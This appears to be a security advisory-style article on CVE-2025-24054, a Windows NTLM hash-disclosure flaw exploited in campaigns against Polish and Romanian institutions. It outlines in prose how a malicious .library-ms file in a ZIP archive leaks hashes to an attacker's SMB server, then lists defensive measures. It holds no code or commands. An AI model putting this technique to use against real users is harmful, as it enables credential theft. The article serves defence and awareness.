A recently identified vulnerability in the Windows NTLM authentication protocol, designated as CVE-2025-24054, has been actively exploited in attacks targeting both government and private institutions. This medium-severity flaw, which was patched in March 2025, allows for NTLM hash disclosure, potentially enabling attackers to perform spoofing attacks over a network.
Understanding the Vulnerability
NTLM (New Technology LAN Manager) is an authentication protocol used in Windows environments to facilitate user authentication. The vulnerability in question, CVE-2025-24054, can be triggered with minimal user interaction. Simply selecting or right-clicking a malicious file can initiate the exploit, leading to the unintended disclosure of NTLM hashes. These hashes can then be leveraged by attackers to gain unauthorized access to systems.
Exploitation Timeline and Targets
According to cybersecurity firm Check Point, exploitation of this vulnerability began approximately one week after Microsoft released patches in March 2025. Between March 19 and March 25, Check Point observed around a dozen malicious campaigns targeting this flaw. The attacks primarily focused on government and private institutions in Poland and Romania. The extracted NTLM hashes were collected on SMB servers located in Australia, Bulgaria, the Netherlands, Russia, and Turkey.
Attack Mechanism
The exploitation process involves the following steps:
1. Delivery of Malicious Archive: The attacker sends a ZIP archive containing a malicious .library-ms file to the target.
2. User Interaction: When the user extracts the ZIP archive and interacts with the .library-ms file (e.g., by selecting or right-clicking it), Windows Explorer initiates an SMB authentication request to a remote server controlled by the attacker.
3. NTLM Hash Disclosure: This interaction results in the unintended disclosure of the user’s NTLM hash to the attacker’s server.
4. Credential Exploitation: The attacker can then use the obtained NTLM hash to perform brute-force attacks to extract the user’s password or mount relay attacks.
Depending on the privileges associated with the compromised account, the attacker could move laterally within the network, escalate privileges, and potentially compromise the entire domain.
Mitigation Strategies
To protect systems from this vulnerability, it is crucial to apply the security updates provided by Microsoft as part of the March 2025 Patch Tuesday. Additionally, organizations should consider the following measures:
– User Education: Train users to recognize and avoid interacting with suspicious files, especially those received from untrusted sources.
– Network Monitoring: Implement monitoring solutions to detect unusual SMB authentication requests and other anomalous network activities.
– Restrict NTLM Usage: Where possible, limit or disable the use of NTLM authentication in favor of more secure protocols like Kerberos.
– Extended Protection for Authentication (EPA): Enable EPA on services such as LDAP and Exchange Server to add an additional layer of verification to authentication requests.
Conclusion
The exploitation of CVE-2025-24054 underscores the importance of timely patch management and proactive security measures. Organizations must remain vigilant, ensuring that security updates are applied promptly and that users are educated about potential threats. By implementing comprehensive security strategies, organizations can mitigate the risks associated with such vulnerabilities and protect their systems from unauthorized access.
